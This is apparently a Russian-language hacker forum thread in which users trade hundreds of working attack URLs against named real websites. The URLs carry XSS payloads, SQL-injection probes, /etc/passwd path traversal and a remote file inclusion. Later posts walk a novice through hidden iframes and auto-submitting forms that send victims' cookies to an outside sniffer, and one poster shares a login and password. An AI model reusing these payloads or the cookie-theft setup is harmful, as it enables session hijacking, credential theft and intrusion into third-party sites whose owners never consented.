Вообщем небольшое предисловие.
Раньше я хотел назвать и тему 667 бажных сайтов, и их действительно столько у меня, но с некоторыми обстоятельствами, я не могу выложить(или выложу потом, по частям.) Все "уязвимости" найдены мною, все совпадения случайности, на момент опубликования, все работало. Естественно я не все крупные ресурсы выложил.
Скачать можно по этой ссылке.
http://kobeluga.narod.ru/bugs.txt

p.s. если кому то помогло, то как отблагодарить знаете(репутация) =)))

ne ploho jdem prodoljeniea banketa

2k1b0rg вот молодчик! секлаб яндекс вебхак рамблер - респект вобщем)

хех, продолжение будет, если данные востановлю после вируса(кто посоветует нормальный антивирус, а то без него хреново)
даже если не востаовлю думаю, я найду способ, еще запостить ;)(скидываем мне в приват сайты) =))

так так значит выложил то наконец=))) с меня репутация!)

2k1b0rg вот молодчик! секлаб яндекс вебхак рамблер
Что то я там секлаб не нашёл.

2k00p3r хм... я точно видел секлабу в списке вчера, может k1b0rg удалил или я с sitecity попутал

секлаб был, но так как уже там бага не работает, я ее прикрыл, и веб хак удалил

Где именно была бага на секлабе?

вот хасаса, только реальный алерт вставлять не советую(он вылетит 200+ раз)

http://audio.rambler.ru/archive.html?s=19311)%22%3E%3Cscript%3Eno-no%3C/script%3E%3Ca%20%22

еще одна, вылетает, где-то 7

http://horoscopes.rambler.ru/day.html?day=1&month=4&year=1900"><script>alert()</script>

и еще под IE нашёл http://vision.rambler.ru/srch/?sort=0&set=vision&control_charset=%CA%EE%ED%F2%F0%EE%EB%FC&words=%22%20style=%22background:url(javascript:ale rt('я%20люблю%20max_pain89'))

http://www.pro-hack.ru/tools/ip.html?myname=%3Cscript%3Ealert%28%29%3C%2Fscript %3E&ipname=&search=
http://geo.webmoney.ru/asp/wmobjects_in_moscow.asp?al=0"><script>alert()</script>
http://zloy.org/news/686'/index.html
http://www.cyberinfo.ru/cgi-bin/proxy/proxy.cgi?host=%3Cscript%3Ealert%28%29%3C%2Fscript %3E&port=8080
http://skvoznoy.org/news-cat/21'/
http://w-hack.net/index.php?option=content&task=category&sectionid=3"%20style=background:url(javascript:alert());"&id=69&Itemid=27
http://www.kkunst.com/kk/print.php?file='
http://top.voffka.com/search.php?key=%3Cscript%3Ealert%28%29%3C%2Fscript %3E&cat=Overall
http://www.leg.state.fl.us/statutes/index.cfm?StatuteYear=2005&AppMode=Display_Results&Mode=Search%2520Statutes&Submenu=2&Tab=statutes&Search_String=%22+style%3Dbackground%3Aurl%28javas cript%3Aalert%28%29%29%3B
http://search.mcc.ac.uk/cgi-bin/htsearch?config=mhn&words=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&x=0&y=0
http://koffiejunk.nl/?file=<script>alert()</script>
http://www.oil-gas.com.ua/data/rus/showdoc.php?file=<script>alert()</script>
http://www.frozenlight.de/engine/show.php?file=<script>alert()</script>
http://www.globalschoolbus.com/tools/tool_page.php?file=\
http://www.cairchicago.org/ournews.php?file=<script>alert()</script>
http://chrisken.utacm.org/cksource.php?file=/home/chrisken/www/code/ckSource.php
http://wwwx.cs.unc.edu/~jsterrel/test/viewsource.php?file=viewsource.php
http://foreverblue.alsgekken.nl/showdoc.php?file=http://kobeluga.narod.ru/nst.php
http://www.nesprogramme.org/download.php?file=../../../../../../../../../../../../etc/passwd
http://www.bissettmags.com.au/cgi-bin/cc_site_manager.pl?sessionKey=107919190464.68.82.1 0&file=../../../../../../../../../../../../etc/passwd
http://www.frostjedi.com/terra/scripts/graemlin/viewsource.php?file=graemlin.php
http://www.theater-schwedt.de/index.php?file=../../../../../../../../../../../../etc/passwd&mex=7
http://beer.km.ru/index.php?file=/etc/passwd
http://www.bobdev.com/downloadstats.php?File=<script>alert()</script>
http://www.mercenaries.ru/inf/newcomm.php?type=gallery&nick=%21+%21+%21+MAXIMILIAN+%21+%21+%21"><script>alert()</script>&page=1

Неплохой список могу токо добавить....
http://www.ntv.ru/news/NewsSearchResult.jsp?urlFilter=news&keytext=%2F%3E%3Cscript%3Ealert%28%27Warning_DT%27 %29%3C%2Fscript%3E
сегодня нашол ...долго смеялся...НТВ всётаки...хеех

Молодец.Так держать.

Да... действительно молодец!

http://www.phrack.org/search/index.php?author=&andor=or&title="%20style=background:url(javascript:alert());"&comment=&submit=submit
http://www.xakep.ru/local/include/iframe_rateit.asp?filedir=25244"><script>alert()</script>
http://otdell.bs.by/show.html?words=%22%3E%3Cscript%3Ealert%28%29%3C%2 Fscript%3E
http://www.missworld.tv/bio/bio.sps?iBiographyID=51851'
http://www.latin.ru/cgi-bin/search/odm.pl?search="><script>alert()</script>
http://yellowpages.rin.ru/cgi-bin/search.cgi?city=&razdel=&page=1&z=TM&text=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&srt=not
http://www.linuxchile.cl/docs.php?op=ver&id=65'
http://www.hw.ru/hi-tech/recordUsers1.jsp?login="><script>alert()</script>
http://www.superq.ru/comments.php?id=82_0_1_0_C"><script>alert()</script>
https://[любой_сайт_использующий_webmo ney_transfer].webmoney.ru/conf/pci_testlink.asp?A=1</xmp><script>alert(1)</script>&b=1<script>alert(2)</script>
http://xtools.org/"%20style=background:url(javascript:alert());".cfm?nft=1&t=6&p=1

http://netsec.ru/modules.php?name=articles&theme=7</a><script>alert()</script>&page=stat&read=yes&mess=1131536252
http://www.ixbt.com/news/index.php?str=%3Cscript%3Ealert%28%29%3C%2Fscript% 3E&x=0&y=0
http://news.ntv.ru/74629<script>alert()</script>/
http://www.gazeta.ru/cgi-bin/newexport/export?action=show&uid=0'&cid=1
http://www.pokupaj.ru/pokupaj.php?sub_=bt&search_=%3Cscript%3Ealert%28%29%3C%2Fscript%3E&id=92
http://pharma-cosmetics.ru/results.php?searchterm=%3Cscript%3Ealert%28%29%3C% 2Fscript%3E
http://www.filemirrors.com/search.src?type=begins&file=%3Cscript%3Ealert%28%29%3C%2Fscript%3E
http://softportal.com/search.php?search=1&search_string=%3Cscript%3Ealert%28%29%3C%2Fscript% 3E
http://city.zp.ua/search.phtml?searchstring=%3Cscript%3Ealert%28%29% 3C%2Fscript%3E&Submit=%ED%E0%E9%F2%E8
http://www.drocher.ru/good.php?rubric_id=29"><script>alert()</script>
http://top.netsec.ru/image2.png?icq=%20288983987&mail=Root@NetSec.ru&name=Green%20Bear&img=1'
http://de.shareware-download.org/%22style%3Dbackground%3Aurl%28javascript%3Aalert%2 8%29%29%3B.php
http://www.nodevice.ru [POST] sql инъекция в поиске (в 3 параметрах)
http://mirrors.zero-united.com/result.php?host=mirrors.zero-united.com&search=Y&Keywords=%3Cscript%3Ealert%28%29%3C%2Fscript%3E&original=
http://viewstat.hotlog.ru/site_stat.php?&HOTLOG_SESSION='
http://hostland.ru/services/domain/check.php?domain=%3Cscript%3Ealert%28%29%3C%2Fscri pt%3E&zone=0&Submit=+%CF%F0%EE%E2%E5%F0%E8%F2%FC+

:mad:
на моем сайте не смотреть, я исправил =))).
спасибо киборг -))

дя? я даже не знал, что он твой.
где-то увидел ссылку решил зайти посмотреть что к чему.
пока я не нашол ни одной уязвимости(из всех сайтов которые я успел просмотрел) на аничате.ру и асечке.ру=))) респект

НЕ доставайте меня с просьбой продать мой сканер, которым я сканирую сайты!!!! у меня его нету, проверяю все РУКАМИ!!!
http://sheriff.md/Search/?Text=%27+style%3Dbackground%3Aurl%28JaVaScRipT%3A alert%28%29%29%3B%27
http://www.homegain.com/real_estate/index?ht=pnf_rc&entryid=5803"><script>alert()</script>
http://audio.kavkazcenter.com/review.php?sid=135'><script>alert()</script>
http://aviabilet.ru/avia/avia/avia_searchres_t?SEARCHFOR=<script>alert()</script>&x=0&y=0
http://catalog.begun.ru/?q=%27%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E
http://slogan.anub.ru/?slogan="style=background:url(javascript:alert());"
http://ru-traffic.com/pgo.php?partner=10407&alarm=1&url=><script>alert()</script>
http://www.gsm-shop.com.ua/index.php?cat=58'
http://www.web-hosting.ru/whois.php?domain=%3Cscript%3Ealert%28%29%3C%2Fscri pt%3E&ext=ru

Вот про енто http://audio.kavkazcenter.com/review.php?sid=135'><script>alert()</script> я могу вам так прямо сказать, что наодном форуме(не буду рекламировать) тебе были бы очень благодарны.
Это тот который про террористов.

да мля про эту команду "антитерроров" уже пол-инета знает.

кавказцентр мне насильно дали ссылку =))))
я им выложил, и сюда тож на всяк выложил.
http://my.is/gallery/showgallery.php?mcats.......
этот баг я нашол на галереи форумов vbulletin, хз но я не видел чтобы до меня кто-то описвал ентот баг, смотри мои сайты, там есть еще парочку сайтов с такой уязвимостью, на них тоже стоит vbulletin.
http://www.pentagon.gov/srch/search...rt=-pub_date%27
это не совсем ошибка.
p.s. скоро еще опубликую список бажных сайтов.

Присоединяемся к акции вылечим инет от xss. Вот от меня кое-что
http://www.rap.ru/artists/&pos_id=7143"><script>alert(/kot777/)</script>
http://www.supreme2.ru/s2/diary/comments/comments.php?id=01_10_05'><script>alert(/kot777/)</script>
http://www.e-pravo.ru/search.php?category=12'><script>alert(/kot777/)</script>
http://webz.priop.ru/index.php?categ=%27
http://www.persons.am/ru/search.php?category=19'><script>alert(/kot777/)</script>
http://www.oberon.ru/magazine_page.php?page_id=5"><script>alert(/kot777/)</script>
http://www.exodist.net/index.php?start=70"><script>alert(/kot777/)</script>
http://www.dolgopa.org/index.php?ids=323"><script>alert(/kot777/)</script>
http://gorodok.samaratoday.ru/webpage.php?id=7"><script>alert(/kot777/)</script>

А на http://www.diary.ru/ у тебя часом ничего нет?

и мой скромный

http://mobile.mail.ru/catalog/content_get.php?tab=3&content_id=21161"><script>confirm('hi-hi')</script><a%20"

http://www.openet.ru/University.nsf/Index.htm!Open&Menu=VPMain&VPID=965"%20style=background:url(javascript:alert());"
http://www.cracklab.ru/xxx/ [POST] " style=background:url(javascript:alert());"
http://www.freedisk.ru/guide.php?cat=11"><script>alert()</script>
http://www.rabota.ru/search/vacancy/?search='"><script>alert()</script>
http://www.forum.md/Albums.aspx?soundslike=<xml>
http://nasa.org/static.asp?search_text=%22style%3Dbackground%3Aurl %28javascript%3Aalert%28%29%29%3B%22&search_source=20
http://search.nasa.gov/nasasearch/search/search.jsp?nasaInclude=66&start=11"><script>alert()</script>
http://www.999.md/results.asp?criteria=%3Cscript%3Ealert%28%29%3C%2F script%3E&lng=1&topic=-1
http://search.ebay.com/search/search.dll?sofocus=bs&sbrftog=1&fcl=4&from=R10&catref=C12&satitle=fur+trim*&sacat=63862%26catref%3DC6&bs=Search&fsop=1%26fsoo%3D1&fgtp=&a54=-24<script>alert()</script>&a22868=-24&a94=-24&gcs=1110&pfid=1283&reqtype=1&pfmode=1&alist=a54%2Ca55%2Ca22868%2Ca53%2Ca94%2Ca3801&pf_query=fur+trim*&sargn=-1%26saslc%3D2&sadis=200&fpos=94062&sappl=1&ftrt=1&ftrv=1&sabdlo=&sabdhi=&saprclo="><script>alert(5)</script>&saprchi='"><script>alert(/k1b0rg/)</script>
http://www.diary.ru/interest/?q=%22style=background:url(javascript:alert());"

Вот тчо за Мода пошла что вы с ними делать собираетесь колекционировать?

Насчет http://www.diary.ru/
как я понял там даеться http://www.diary.ru/~вася может вэто вася вставить ну скриптик со снифером?
Тк сайт один же.

http://www.diary.ru/list/?sort=XSS
воть те XSS

Вот тчо за Мода пошла что вы с ними делать собираетесь колекционировать?
а чтобы были, может инет в будующем избавиться от таких глупых ошибок, секьюрити сайты сразу залатали эти баги, после того как я опубликовал.
а сайты типа pro-hack skvoznoy zloy, они нифига не латают.
я хочу чтобы инет, перестал содержать такие ошибки, конечно это нереально такое сделать ,но хоть чучуть я сделаю его почище

Не знаю как вы, но я уважаю "k1b0rg" и этот сайт!!!
Огрромный Респект...........всем его пользователям :)
для k1b0rg
- ну чё там с чатом?! кодта топ дашь?

http://www.wargames.ru/search.php?query=%27
http://www.ccg.ru/sections.php?op=listarticles&secid=285'
http://www.rolemancer.ru/search.php?query=%27
http://rulezzz.dp.ua/fotos/<script>alert()</script>
http://listsoft.ru/search.php?q=%27%22%3E%3Cscript%3Ealert%28%29%3C%2 Fscript%3E&section=soft&progs=yes&arts=yes&tips=yes&progname=yes&progdescr=yes&progurl=yes&artname=yes&art=yes&tipname=yes&tip=yes
http://opengl.net/ поиск "style=background:url(javascript:alert());"
http://www.eurochat.ru/?go=gal&page=7"><script>alert()</script>
http://www.netflix.com/MovieDisplay?movieid=70011207<script>alert()</script>&trkid=135437
http://a9.com/-/search/imageResult?q=666&t=f1263.jpg&ru="style=background:url(javascript:alert(1));&u="style=background:url(javascript:alert(2));&ih=296&iw=425&th=84&tw=122&id=I-RBtbW0cGoJ

k1b0rg

Вопрос лично к тебе, я в нахождение багов новичок, вот нашёл тут одну вешь, может подскажеш как им воспользоватся ?

http://www.mix.az/engine/modules/imagepreview.php?image='

Ну и какая ж там бага? =)

вот бага
http://www.mix.az/engine/modules/imagepreview.php?image=');</script><script>alert()</script>
а как воспользоваться ,ищи в поиске "пассивные xss"
здесь описывать не буду, много, ды это прочитай а что непонятное спрашивай.
ОБНОВЛЕНИЕ
http://www.drweb.ru/buy/invoice/?computers=&period=1y&email=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3 E&phone=%22%3E%3Cscript%3Ealert%282%29%3C%2Fscript%3 E&j_address=%22%3E%3Cscript%3Ealert%283%29%3C%2Fscri pt%3E&m_address=%22%3E%3Cscript%3Ealert%284%29%3C%2Fscri pt%3E&org=%22%3E%3Cscript%3Ealert%285%29%3C%2Fscript%3E&kpp=%22%3E%3Cscript%3Ealert(6)</script>&currency=RUR&act=finish&prodid=01-D
http://www.multitran.ru/c/m.exe?HL=2&L1=1&L2=2&EXT=0&s=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E
http://bugs.php.net/report.php?in%5Bdid_luser_search%5D=0&in%5Bemail%5D=&in%5Bphp_version%5D=%27%22%3E%3Cscript%3Ealert%28% 29%3C%2Fscript%3E&in%5Bbug_type%5D=*General+Issues&in%5Bphp_os%5D=&in%5Bsdesc%5D=&in%5Bpasswd%5D=&captcha=&in%5Bldesc%5D=&in%5Brepcode%5D=&in%5Bexpres%5D=&in%5Bactres%5D=
http://www.cafepress.com/cp/search/search.aspx?source=searchBox&q=%27%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&cfpt2=&copt=&cfpt=&x=26&y=8
http://www.phpbbhacks.com/searchresults.php?version=2"><script>alert()</script>&query=666&search_type=1&Submit=Go
http://www.tstyle.ru/price/1001636'
http://xrout.org/index.php поиск "><script>alert()</script>
http://www.etegro.com/rus/?module=items&id=22'"&text=1"><script>alert()</script>

Я искал, 3 часа но всё без успешно, нечего не нашёл, как юзать пасивный Xss. Может в аське поговорим ?

Я искал, 3 часа но всё без успешно, нечего не нашёл, как юзать пасивный Xss. Может в аське поговорим ?
на почитай
http://dante.net.ru/forum/printthread.php?t=225
а так общий вид сводиться к тому, что имеется допустим твоя страничка, ставишь на нее два фрейма, один скрытый, в него помещаешь xss пасивную и сниффер.
это я тебе на "пальцах объяснил"

k1b0rg глянь сайт www.superchat.ee
говорят что очень хорошо защищён)

Раньше тоже бегал искал потом понял.

Вот тебе XSS на твоем чате
http://www.superchat.ee/cgi-bin/00/User.Info?<script>alert(/XSS/)</script>&info

http://www.superchat.ee/cgi-bin/gallery?cat=M&show="+style%3Dbackground:url(javascript:alert());"
вот тебе еще код
хаха, сделали защиту от =.
и ваще люди, когда вы говорите найдите мне уязвимость, то не надо потом кричать как ею воспользоваться!

http://www.hackthissite.org

Найди мне багу здесь.

пока нашол раскрытие пути, щас еще поищу
Warning: Cannot modify header information - headers already sent by (output started at /var/www/hackthissite.org/html/includes/layout/header.php:12) in /var/www/hackthissite.org/html/pages/articles/read_article.php on line 21
You are not logged in! Redirection to: http://www.illgotten.net/view/390.phpIf you wish to view this article with added HTS functionality, please register/login in

Это не бага, это ошибка которая говорит, что ты не зареган не залогинен.

Найдешь мне багу на этом сайте, буду у тебя в долгу. Это касается всех. Кто найдет багу на этом сайте, у того Белый Джордан будет официально в долгу. :rolleyes:



Логин и пассворд для желающих. :rolleyes:


zaq123qwerty:12345

http://megafon.buongiorno.com/megafon/web/russian/index.html где просят номер телефона (+7....)Можно вводить любой код
http://www.tefal.ru/tefal/magazine/recipe_results.asp?keyword=">%3Cscript%3Ealert%28%29%3C%2Fscript%3E&selectName=&APPLIANCE=&SPECIAL_DIETS=&x=0&y=0
http://lafox.net/shop/?gid=73'"><script>alert()</script>
http://www.hacktivist.net/anarchy/index.php?action=search'
http://www.sexonly.ru/katalog.php?ganr=20'
http://www.icq.com/icqchat/browse_folder.php?tid=30279";//--></script><script>alert()</script>
http://www.download.com/3120-20_4-0.html?tag=srch&nid=1&qt=666&tg=dl-2001"><script>alert()</script>
http://www.osmarket.ru/products/5'
http://zubov.net/666"%20style=background:url(javascript:alert());".cfm?nft=1&t=5&p=1
http://drocher.ru/goods_list.php?rubric_id=14"><script>alert()</script>

http://hosting.mail.ru/WhoisService.jsp?domain=<img%20style="background:url(vbscript:confirm())"> IE

на почитай
http://dante.net.ru/forum/printthread.php?t=225
а так общий вид сводиться к тому, что имеется допустим твоя страничка, ставишь на нее два фрейма, один скрытый, в него помещаешь xss пасивную и сниффер.
это я тебе на "пальцах объяснил"
-------------------------------------------------------------------
Вот прочитал статью и сделал всё как тама :

<html>
<body onload="document.forms['snif'].submit()">
<form name="snif" action="http://www.mix.az/engine/modules/imagepreview.php?image=');">
<input type="text" name="word" value="<script>img = new Image();

img.src='http://antichat.ru/cgi-bin/s.jpg'+document.cookie;</script>">
</form>
---------------------------------------------------------------------
Сохранил всё на ХТМЛ, и поместил у себя на сайте,открыл эту страничку , алерт не кидает, и на лог снифера нечего не идёт , почему , что я так не делаю под правь меня?

http://www.npj.ru/in/dura-lex-group/by/pvp/42564"%20style=background:url(javascript:alert());"

http://www.uinc.ru/news/sendnews.php
тема:" style=background:url(javascript:alert(1));"
Сообщение:</textarea><script>alert(2)</script>
Ваше имя:" style=background:url(javascript:alert(3));"
Ваш E-mail:" style=background:url(javascript:alert(4));"
Введите код, указанный на картинке: НЕ ввожим, жмем отправить получаем alert
может быть это и активная xss, хз я не проверял.

p.s. Tem
в скрытом фрейме можешь просто написать
<script>img = new Image(); img.src="http://antichat.ru/cgi-bin/s.jpg"+document.cookie;</script>
а не видно, наверное потому он и скрытый

Так или я рехнулся, или уже спать хочется, и я перестал сооброжать, а где этот скрытый фрейм. ((

Или мне проста надо создать фрейм ?

Замени весь файл на
<iframe widht=0 height=0 frameborder=0 src=http:/// ></iframe>
да и все дела

это я знаю но опять фигня какаята, посмотрите сами

http://milliondollarhome-page.net/sniff.htm

<AD- me замени на <iframe
<AD- ame>замени на </iframe>
почитай про фреймы.Возьми какой нить учебник и прочти, там немного читать, зато сразу разберешься что к чему

хха -) отключи свою банерорезку -) у меня из-за Outpost'а такая же хрень.

Я про фреймы читал и знаю, но как эксплотировать нет, и у меня сейчас на часах 2 ночи, както не охота читать, вот мой код.
<html>
<iframe widht=0 height=0 frameborder=0 src=http://www.mix.az/engine/modules/imagepreview.php?image=');</script><script>img = new Image(); img.src="http://antichat.ru/cgi-bin/s.jpg"+document.cookie;</script>
</iframe>
</html>
Замени его по своему если не трудно, ото я три дня над этим сижу.

http://antichat.ru/cgi-bin/s.jpg?
вопрос должен в конце стоять.а так вроде все прально.
у тебя должно три страницы
1-главная(в ней тока коды размещения фреймов)
2-Тело, то что будет видеть чел когда зайдет на твой сайт.
3-скрытый фрейм(тот что ты написал вверху)
если у тебя ничо не получиться, я те завтра отпишу готовый пример.
хха -) отключи свою банерорезку -) у меня из-за Outpost'а такая же хрень.
блин точна, я и забыл что велел ему все блокировать, апплеты, флеш, скрытые фреймы, и т.д.

k1b0rg попробуй найти xcc на www.wwc.ru

http://www.footbolka.ru/catalog/index.php?ref=xren'
http://www.whoistar.com/content/view/55/1'/
http://narod.yandex.ru/userforum/message.xhtml?owner=[название_форума_жертвы]&message_id=3042605&thread_id=0&nickname=&email=&vari=2<script>alert()</script>
http://www.allpravo.ru/?id=88&type=0&query='"
http://www.classis.ru/cgi-bin/links/classis/review.cgi?Review_Subject=&Review_ByLine=%22style%3Dbackground%3Aurl%28javasc ript%3Aalert%281%29%29%3B%22&Review_Contents=&Review_GuestName=%22style%3Dbackground%3Aurl%28jav ascript%3Aalert%282%29%29%3B%22&Review_GuestEmail=%22style%3Dbackground%3Aurl%28ja vascript%3Aalert%283%29%29%3B%22&ID=7981&add_this_review=1&add_review=%C4%EE%E1%E0%E2%E8%F2%FC+%EE%F2%E7%FB%E 2
http://www.refer.ru/menu?a=select_add&id="><script>alert()</script>
http://test.msk.ru/cgi-bin/searchdiplom2.cgi?words=%3Cscript%3Ealert%28%29%3C %2Fscript%3E

2porter http://wwc.ru/index.php?do=search&ss=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E

http://pointblanksecurity.com/xss/xss2.php

http://www.mtve.com/index.php?Page=2"><script>alert()</script>
http://register.logitech.com/index.cfm?validate=1";</script><script>alert()</script>
http://www.w3.org/Search/Mail/Public/search?keywords=&hdr-1-name=subject&hdr-1-query=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3 E&index-grp=Public__FULL&index-type=t&type-index=%22%3E%3Cscript%3Ealert%282%29%3C%2Fscript%3 E
http://serial.com/?show=%3Cscript%3Ealert%28%29%3C%2Fscript%3E&submit=Search
http://www.phpbuilder.com/snippet/browse.php?by=cat&cat=1"style=background:url(javascript:alert());"
http://poisk.ru/#"><script>alert()</script>
http://an.aport.ru/scripts/template.dll?That=ref&r=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&Base=referat&Rt=2
http://www.sexvideogid.ru/search.php?q=%22%3E%3Cscript%3Ealert%28%29%3C%2Fsc ript%3E
http://www.ag.ru/cheats/baldurs_gate_2_throne_of_bhaal/15170"><script>alert()</script>
http://catalog.aport.ru/rus/themes.aspx?id=1778'"><xz>
http://multifon.ru/stm/stm_popup.php?pid=54&type=jpg&name=666&url="style=background:url(javascript:alert());"
http://www.chestertonholdings.com/inquiry_handler.php отсутствует проверка полей
http://www.iceberg.ru/services/?id=23'&parent=0

http://www.scriptsearch.com/cgi-bin/report.cgi?999=delete&ID=%3Cscript%3Ealert('XSS')%3C/script%3E

http://1ps.ru/pr/ отсутствует проверка полей
http://seminar.spylog.ru/?rp=seminars/descr/15/ отсутствует проверка полей
http://members.yadro.ru/banners/nowstate.php3?vbn_id=-1'
http://hw.ru/hi-tech/Login.jsp?login='"><script>alert(1)</script>&password='"><script>alert(2)</script>
http://www.srb.ru/search-results/?q=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&m=all&wm=wrd&ps=10&page=0
http://www.profits.ru/login.php?w=user&o=login&e=u'
http://www.gf.ru/cgi-bin/podftp.cgi?hostname=<script>alert()</script>
http://www.zerkalo.com/cgi-bin/mail/adduser.cgi вводим в дополнительно->наши новости:Разные словосочетания допустим '"><script>!! в поля email и имя, и получаем на выходе http://www.zerkalo.com/cgi-bin/mail/adduser.cgi со строкой/home/ztu22/dead.letter... Saved message in /home/ztu22/dead.letter
http://smchat.ru/?s=reguser&login="><script>alert()</script>
http://www.film.ru/search.asp?what=%22style%3Dbackground%3Aurl%28java script%3Aalert%28%29%29%3B%22&where=root&mode=medium

http://forum.utro.ru/newuser.php?Cat=<script>alert('xss')</script>
жмём "далее" - три xss

http://go.mail.ru/frame.html?imgurl=http://antichat.ru/cgi-bin/s.jpg?+document.cookie&pageurl=http://antichat.ru/cgi-bin/s.jpg?+oO[SNIFF.SUPER.PUPER-BOY.FORUM.ANTICHAT.RU]Oo&iid=aWAoanJ00EEJ&imgwidth=%3Cscript%3Ealert('www.xss.ru')%3C/script%3E&imgheight=%3Cscript%3E


Потом бежим на

http://antichat.ru/sniff/log.php

И БАЧИМ ЧТО ПОЛУЧИЛОСЬ!

http://64.233.161.104/search?hl=ru&q=http%3A%2F%2F64.233.161.104%2Fsearch%3Fq%3Dcache %3AQxqYk3NwuhsJ%3Asunhi.us%2FphpBB2%2Fviewtopic.ph p%253Fp%253D6440%2526sid%253D8719e7ad6743826b960ef 8d25f30cedc%2B111110A%2Fhttp%26hl%3Den%26start%3D1 13&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA+%D0%B2+Google&lr=

Гooгle Ошибка


Мы сожалеем...
... но мы не можем обработать ваш запрос прямо сейчас. Компьютерный вирус или spywаre приложение пересылка нам автоматизированные запросы, и это появляется, что ваш компьютер или сеть был заражен.

Мы восстановим ваш доступ как быстро как только возможно, так пробуют снова скоро. Пока суд да дело, вы, возможно, хотели бы бежать вирусный информатор или spywаre перевозчик мебели чтобы убедиться, что ваш компьютер свободен от вирусов и другого поддельного программного обеспечения.

Мы извиняемся за неудобство, и надеемся, что мы увидимся снова на Google.

Они саме по себе ошибки

http://members.yadro.ru/banners/nowstate.php3?vbn_id=-1' (http://members.yadro.ru/banners/nowstate.php3)
http://www.profits.ru/login.php?w=user&o=login&e=u' (http://www.profits.ru/)

Они саме по себе ошибки
угу, там просто показываються серверный пути, в принципе они ничего не дают, но мало ли.
Внимание!
Эти сайты я опубликую в последний раз, т.к. растет недовольство против меня, я типо флудер, публикую тока из-за репцтации, сайты мои никому нах не нужны и т.д. В связи с этим, я публиковать сайты больше не буду.
http://search.cstrike.ru/?search='
http://search.gamestone.ru/?search=<script>alert()</script>
http://3mp3.ru/ru/search/text/?request=%27%3E%3Cscript%3Ealert%28%29%3C%2Fscript %3E&what=all
http://www.mestkom.ru/asp/search.asp?action=search не фильтруються поля
http://holidayclub.inprogress.ru/catalog/index.php?flet="><script>alert()</script>&Co=4&Re=460
http://hotels.wia.ru/<script>alert()</script>
http://encycl.accoona.ru/?word=%3Cscript%3Ealert%28%29%3C%2Fscript%3E
http://www.bioone.org/bioone/?request=<script>alert()</script>
http://www.openhardware.net/?file=<script>alert()</script>
http://www.avionicsmagazine.com/cgi/av/show_mag.cgi?pub=av&file=../../../../../../../../../../../etc/passwd
http://www.lamuv.de/cgi-bin/store.cgi?action=gamma&file=../../../../../../../../../../../etc/passwd
http://alumni.calstatela.edu/document.cgi?section=about&file=../../../../../../../../../../../etc/passwd
http://www.optimize.nl/site/jsp/print.jsp?file=<script>alert()</script>
http://www.linuxhq.com/perl-bin/search_db?q=%27style%3Dbackground%3Aurl%28javascri pt%3Aalert%28%29%29%3B%27&qid=4&spp=20

http://rusoft.net/index.php?w=1133178547&cat=0&razdel=<script>alert(/xss/)</script>

не фига себе не нужны, я себе 9 Ftp поднял

на пассивном хсс???)))))

нет, на /etc/passwd не все же умные, и ставят пароль и логин разные, есть и иные... их зовут - лолы

нашол уязвимость
http://www.kalitva.ru/_/?vs=<script>javascript:alert('')</script>foto/look&id=2710&razdel=7&page=27
ps незнаю как использовать !!! =))))

Tikson Причём тут Бажные сайты от k1b0rg'a?=))
Полно инфы есть везде по ипользованию Пассивных XSS.
Вот статейку почитай.
_http://dante.net.ru/forum/showthread.php?t=225
Не забываем про репутацию, если помог ;-) За наводку=)))))))))

новодка эта уже была ..... =)))
ps вот **ня полная почему у всех этот Damage Lab НЕНАВИЖУ его а именное его создателя винукса дружили дружили с ним а потом бац и все ... гад он !!!
ps ps а еще есть где-нибуть почитать про это???
ps ps ps а то что я нашол это вообще считается уязвимостью ????

Еще один в коллекцию...
http://www.pages.ru/search.html?text=%3Cscript%3E+alert%28%22%21%22%29 %3B+%3C%2Fscript%3E&doSearch=%CD%E0%E9%F2%E8

http://www.atlasofscience.org/main/vacancy/search.php?subject=all&words=%3Cscript%3Ealert%28%2Flol%2F%29%3C%2Fscript %3E
http://www.atlasofscience.org/main/vacancy/vacancy.php?mesid=' (http://www.atlasofscience.org/main/vacancy/vacancy.php?mesid=)
http://vz.ru/search/?action=search&s_string="><h1>lol</h1>

Ну вот например:
http://ля-ля-тополя<script>alert()</script>
И что с этим дальше можно делать?
Свой скрипт вставить мона, или что-то еще?
(я только начал :))

vovanAdam Уже обсуждалось. Юзай поиск. А если что-то захотел спросить, то создавай отделюную тему. Твой вопрос к Бажным сайтам от Киборга не имеет ни кокого отношения!

rap.ru - <script>alert('lol')</script> v stroke poiska ))

_http://delit.net/search/search_result.phtml?sstr='><script>alert(/lol/)</script>&skind=' potom kliknite na luboj ssylke, vyletaet alert

_http://search.espn.go.com/keyword/searchESPNShop?searchString=XSS

_http://app.abc.go.com/keyword/searchResults?search=%3Cscript%3Ealert%28%27lol%27 %29%3C%2Fscript%3E&searchType=0